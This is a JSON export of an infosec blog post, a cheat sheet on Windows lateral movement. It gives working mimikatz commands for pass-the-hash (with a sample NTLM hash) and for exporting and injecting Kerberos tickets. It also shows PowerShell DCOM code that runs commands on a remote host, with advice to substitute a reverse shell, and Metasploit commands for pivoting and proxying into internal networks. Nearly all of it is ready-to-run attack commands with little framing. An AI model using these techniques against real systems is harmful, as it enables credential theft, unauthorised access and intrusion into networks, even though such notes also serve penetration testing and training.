{"id":1324,"date":"2020-04-26T17:19:13","date_gmt":"2020-04-26T15:19:13","guid":{"rendered":"https:\/\/andreas-klingler.de\/infosec\/?p=1324"},"modified":"2024-09-16T19:02:01","modified_gmt":"2024-09-16T17:02:01","slug":"lateral-movement-in-windows","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=1324","title":{"rendered":"Lateral movement"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">Logon on another system with a <span class=\"caps\">NTLM<\/span>&nbsp;hash<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Sce\u00adnario:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>You are admin on a Win\u00addows system<\/li>\n\n\n\n<li>You have anoth\u00ader user\u2019s <span class=\"caps\">NTLM<\/span>&nbsp;hash<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Then, use mimikatz to inject anoth\u00ader user\u2019s <span class=\"caps\">NTLM<\/span> hash into the secret storage:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Inject the <span class=\"caps\">NTML<\/span> hash for anoth\u00ader user:<br><code>sekurlsa::pth \/user:peter \/domain:dom.ain \/ntlm:ed6686fedb60840cd49b5286a7c08fa4 \/run:powershell<\/code><br>After exe\u00adcut\u00ading this com\u00admand, a Pow\u00ader\u00adShell (or some\u00adthing else\u2026) is opened for the oth\u00ader&nbsp;user.<\/li>\n\n\n\n<li>Try to login some\u00adwhere as the oth\u00ader user:<br><code>net use \\\\files<\/code><br>This per\u00adforms also a login to the file serv\u00ader, where now peter is&nbsp;used.<\/li>\n\n\n\n<li>See the tick\u00adets:<br><code>klist<\/code><\/li>\n<\/ol>\n\n\n\n<h2 class=\"wp-block-heading\">Steal another user\u2019s session<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Sce\u00adnario:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>You have admin\u00adis\u00adtra\u00adtive priv\u00adi\u00adleges for a Win\u00addows user&nbsp;A.<\/li>\n\n\n\n<li>Anoth\u00ader user B has a cur\u00adrent ses\u00adsion on the same system.<\/li>\n\n\n\n<li>We want do do some\u00adthing with B\u2019s priv\u00adi\u00adleges, e.g. access a web share <code>\\\\files\\backup<\/code>.<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Then, with the use of mimikatz:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">privilege::debug<br>sekurlsa::tickets \/export<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This exports avail\u00adable tick\u00adets into the work\u00ading direc\u00adto\u00adry (suf\u00adfix <code>.kirbi<\/code>). Then, choose one file\/ticket from the cor\u00adrect user and ser\u00advice. For exam\u00adple: The&nbsp;file<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">[0;bce15]-0-0-40810000-peter@cifs-files04.kirbi<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">con\u00adtains the <span class=\"caps\">TGS<\/span> tick\u00adet from the user peter for the <span class=\"caps\">CIFS<\/span> (file share\/smb) ser\u00advice on serv\u00ader files04. In mimikatz, inject this <span class=\"caps\">TGS<\/span> to the cur\u00adrent (oth\u00ader) user&nbsp;with<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">privilege::debug<br>kerberos::ptt $filename<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Check then with klist that the oth\u00ader users tick\u00adets war inject\u00aded. Then, you can access the resource e.g. with <code>ls \\\\files\\backup<\/code>.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Logon on another system via&nbsp;<span class=\"caps\">DCOM<\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Note: See <a href=\"https:\/\/www.cybereason.com\/blog\/dcom-lateral-movement-techniques\">Cyberea\u00adson<\/a> for more techniques.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Sce\u00adnario:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>You are on a shell of an user who is also a local&nbsp;admin.<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">In Pow\u00ader\u00adShell, cre\u00adate a <span class=\"caps\">DCOM<\/span> con\u00adnec\u00adtion and replace calc.exe with a <a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=2288\" data-type=\"post\" data-id=\"2288\">Pow\u00ader\u00adShell reverse code<\/a> or some\u00adthing else more useful:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application.1\",\"$target\"))<br>$dcom.Document.ActiveView.ExecuteShellCommand(\"cmd\",$null,\"\/c calc\",\"7\")<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Open a reverse shell han\u00addler before, obviously.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Pivoting to an internal network with Metasploit<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Sce\u00adnario:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>You are on sys\u00adtem A and detect\u00aded anoth\u00ader net\u00adwork 10.10.10.0\/24 you could reach via&nbsp;A.<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Man\u00adu\u00adal\u00adly:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Open a meter\u00adpreter ses\u00adsion on the first target.<\/li>\n\n\n\n<li>Back\u00adground the ses\u00adsion with <code>bg<\/code>.<\/li>\n\n\n\n<li>Set a route to the tar\u00adget net\u00adwork via the sus\u00adpend\u00aded ses\u00adsion:<br><code>route add 10.10.10.0\/24 $sessionID<\/code><\/li>\n\n\n\n<li>Now, you can use IPs from this net\u00adwork in Metas\u00adploit for oth\u00ader modules.&nbsp;<ul class=\"wp-block-list\">\n<li>One exam\u00adple, port scan\u00adning:<br><code>use auxiliary\/scanner\/portscan\/tcp<br>set RHOSTS 10.10.10.42<br>set PORTS 80,443,1234<br>run<\/code><\/li>\n<\/ul>\n<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">Auto\u00admat\u00adic: This mod\u00adule detects all net\u00adwork inter\u00adfaces on the tar\u00adget and cre\u00adates routes for all subnets:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Open a meter\u00adpreter ses\u00adsion on the first target.<\/li>\n\n\n\n<li>Back\u00adground the ses\u00adsion with <code>bg<\/code>.<\/li>\n\n\n\n<li>Use the autoroute mod\u00adule:<br><code>use multi\/manage\/autoroute<br>set session $sessionID<br>run<\/code><\/li>\n\n\n\n<li>Now, check with route that all routes were&nbsp;added.<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">After\u00adwards: Set up a <span class=\"caps\">SOCKS<\/span> proxy so that oth\u00ader soft\u00adware on the own sys\u00adtem can inter\u00adact with the inter\u00adnal host (use <a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=3109\" data-type=\"post\" data-id=\"3109\">prox\u00ady\u00adchains<\/a> with this&nbsp;proxy):<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">use auxiliary\/server\/socks_proxy<br>set SRVHOST 127.0.0.1<br>run -j<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Now, 127.0.0.1:1080 can be&nbsp;used.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Other links<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=496\">Main\u00adtain shell acces<\/a>s<\/li>\n\n\n\n<li><a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=2288\" data-type=\"post\" data-id=\"2288\">See the Reverse shell arti\u00adcle<\/a>, it con\u00adtains var\u00adi\u00adous (Pow\u00ader\u00adShell) tech\u00adniques which can also be used to spawn shells on oth\u00ader systems.<\/li>\n\n\n\n<li>See <a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=1839\" data-type=\"post\" data-id=\"1839\">Com\u00admand Exe\u00adcu\u00adtion on Windows<\/a><\/li>\n\n\n\n<li><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Logon on anoth\u00ader sys\u00adtem with a <span class=\"caps\">NTLM<\/span>&nbsp;hash Sce\u00adnario: Then, use mimikatz to inject anoth\u00ader user\u2019s <span class=\"caps\">NTLM<\/span> hash into the secret stor\u00adage: Steal anoth\u00ader user\u2019s ses\u00adsion Sce\u00adnario: Then, with the use of mimikatz: privilege::debugsekurlsa::tickets \/export This exports avail\u00adable tick\u00adets into the work\u00ading direc\u00adto\u00adry (suf\u00adfix .kir\u00adbi). Then, choose one file\/ticket from the cor\u00adrect user and ser\u00advice.&nbsp;For&nbsp;[\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[474],"tags":[260,24],"class_list":["post-1324","post","type-post","status-publish","format-standard","hentry","category-lateral-movement","tag-lateral-movement","tag-windows"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1324","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1324"}],"version-history":[{"count":12,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1324\/revisions"}],"predecessor-version":[{"id":4446,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1324\/revisions\/4446"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1324"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1324"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1324"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}